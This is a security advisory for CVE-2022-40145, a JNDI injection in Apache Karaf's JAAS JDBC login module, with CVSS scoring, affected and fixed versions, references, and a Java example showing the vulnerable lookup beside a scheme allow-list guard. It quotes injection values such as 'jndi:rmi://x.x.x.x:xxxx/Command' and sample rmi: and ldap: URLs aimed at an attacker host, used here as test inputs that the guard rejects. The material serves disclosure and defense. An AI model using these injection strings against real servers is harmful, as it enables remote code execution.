CVSS3: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (base score 9.8, Critical)
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
EPSS percentile: 38.6%
This vulnerability is a JNDI injection in the Apache Karaf JAAS JDBC login module that leads to code execution when an attacker controls the LDAP (or RMI) server named in the JDBC data source's JNDI URL. The method JDBCUtils#doCreateDatasource (jaas/modules/src/main/java/org/apache/karaf/jaas/modules/jdbc/JDBCUtils.java) passes the configured data source name straight to InitialContext.lookup(jndiName) without any filtering. The report demonstrated this by changing the login module option in JdbcLoginModuleTest#setup from

options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());

to

options.put(JDBCUtils.DATASOURCE, "jndi:rmi://x.x.x.x:xxxx/Command");

so that the lookup is resolved against a remote RMI registry instead of the local OSGi service registry. The same applies to a JNDI LDAP data source URI: when a configuration points the lookup at an LDAP server under attacker control, the attacker can answer the lookup with a malicious object reference and obtain remote code execution (RCE) in the Karaf process. Exploitation therefore requires either control of the server the existing JNDI URL references or the ability to set the datasource option in the login module configuration. This issue affects all versions of Apache Karaf up to and including 4.4.1 on the 4.4.x line and 4.3.7 on the 4.3.x line. It is fixed in 4.4.2 and 4.3.8; maintainers encourage users to upgrade to at least those versions.
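The lookup pattern the advisory describes, reduced to a standalone example added here (this is not Karaf's code and not its actual patch): the datasource option is split on its prefix and the jndi: remainder goes verbatim to InitialContext.lookup(), shown beside a guarded version that refuses JNDI names carrying a remote URL scheme. The class name JndiDatasourceGuard, the option key "datasource", the helper names, the sample values and the java/osgi allow-list are assumptions made for the illustration.

```java
import java.util.LinkedHashMap;
import java.util.Locale;
import java.util.Map;
import java.util.Set;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import javax.sql.DataSource;

/**
 * Illustration of the lookup pattern behind CVE-2022-40145 and one way to constrain it.
 * Not Apache Karaf's code: class, method names and the allow-list policy are hypothetical;
 * only the "osgi:"/"jndi:" option prefixes and the unfiltered InitialContext.lookup()
 * call mirror what the advisory describes.
 */
public class JndiDatasourceGuard {

    static final String DATASOURCE = "datasource";   // login module option key (assumed name)
    static final String JNDI_PREFIX = "jndi:";

    // JNDI URL schemes resolved in-process and therefore allowed here (assumed policy).
    // Anything else (rmi:, ldap:, ldaps:, iiop:, corbaname:, ...) is dispatched by
    // InitialContext to a URL context factory that contacts the server named in the
    // string itself, regardless of the provider the InitialContext was configured with.
    static final Set<String> LOCAL_SCHEMES = Set.of("java", "osgi");

    /** Vulnerable shape: whatever follows "jndi:" goes straight to the naming context. */
    static DataSource lookupUnfiltered(Map<String, ?> options) throws NamingException {
        String value = (String) options.get(DATASOURCE);
        if (value == null || !value.startsWith(JNDI_PREFIX)) {
            throw new IllegalArgumentException("not a jndi: datasource option: " + value);
        }
        // "jndi:rmi://attacker:1099/Command" or "jndi:ldap://attacker/cn=x" ends up here
        return (DataSource) new InitialContext().lookup(value.substring(JNDI_PREFIX.length()));
    }

    /**
     * Returns the JNDI name if it carries no URL scheme or only an in-process one;
     * throws for anything that would reach out to a remote naming service.
     */
    static String requireLocalJndiName(String jndiName) {
        if (jndiName == null || jndiName.isBlank()) {
            throw new IllegalArgumentException("empty JNDI name");
        }
        int colon = jndiName.indexOf(':');
        int slash = jndiName.indexOf('/');
        // A scheme is the token before the first ':' as long as that ':' precedes any '/'
        // ("jdbc/karafdb" has none; "rmi://h/x" and "java:comp/env" do).
        if (colon > 0 && (slash < 0 || colon < slash)) {
            String scheme = jndiName.substring(0, colon).toLowerCase(Locale.ROOT);
            if (!LOCAL_SCHEMES.contains(scheme)) {
                throw new IllegalArgumentException(
                        "JNDI scheme '" + scheme + "' is not permitted for a datasource lookup");
            }
        }
        return jndiName;
    }

    /** Hardened shape: validate the name before the naming context ever sees it. */
    static DataSource lookupFiltered(Map<String, ?> options) throws NamingException {
        String value = (String) options.get(DATASOURCE);
        if (value == null || !value.startsWith(JNDI_PREFIX)) {
            throw new IllegalArgumentException("not a jndi: datasource option: " + value);
        }
        String jndiName = requireLocalJndiName(value.substring(JNDI_PREFIX.length()));
        return (DataSource) new InitialContext().lookup(jndiName);
    }

    /** Runs the validator over constructed sample option values; no network lookup is made. */
    public static void main(String[] args) {
        Map<String, String> samples = new LinkedHashMap<>();   // constructed inputs -> expected outcome
        samples.put("jndi:java:comp/env/jdbc/karafdb", "allowed");
        samples.put("jndi:jdbc/karafdb", "allowed");
        samples.put("jndi:osgi:service/javax.sql.DataSource", "allowed");
        samples.put("jndi:rmi://192.0.2.10:1099/Command", "rejected");
        samples.put("jndi:ldap://192.0.2.10:389/cn=exploit", "rejected");
        samples.put("jndi:LDAPS://192.0.2.10/cn=exploit", "rejected");
        for (Map.Entry<String, String> e : samples.entrySet()) {
            String name = e.getKey().substring(JNDI_PREFIX.length());
            String outcome;
            try {
                requireLocalJndiName(name);
                outcome = "allowed";
            } catch (IllegalArgumentException ex) {
                outcome = "rejected";
            }
            System.out.printf("%-8s %-44s expected %s%n", outcome, e.getKey(), e.getValue());
        }
    }
}
```

Compile with javac JndiDatasourceGuard.java and run it; main only exercises the validator, so no naming provider or network is needed. The scheme check is the important part: InitialContext.lookup("rmi://host/x") is routed to the RMI URL context factory by the string's scheme alone, so whoever can influence the configured value picks the server. Since JDK 8u121 (RMI) and 8u191 (LDAP) the runtime no longer loads classes from remote codebases returned by such lookups, but a lookup can still hand back a serialized object or a Reference whose factory class is already on the classpath, so rejecting the remote scheme at the configuration boundary, or upgrading to a fixed Karaf release, remains the right fix.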
Vendor | Product | Version | CPE |
---|---|---|---|
org.apache.karaf | apache-karaf | * | cpe:2.3:a:org.apache.karaf:apache-karaf:*:*:*:*:*:*:*:* |
gitbox.apache.org/repos/asf?p=karaf.git;h=2a933445d1
gitbox.apache.org/repos/asf?p=karaf.git;h=3819f48341
github.com/advisories/GHSA-c2p4-8mvv-rwmv
github.com/apache/karaf/pull/1632
issues.apache.org/jira/browse/KARAF-7568
karaf.apache.org/security/cve-2022-40145.txt
nvd.nist.gov/vuln/detail/CVE-2022-40145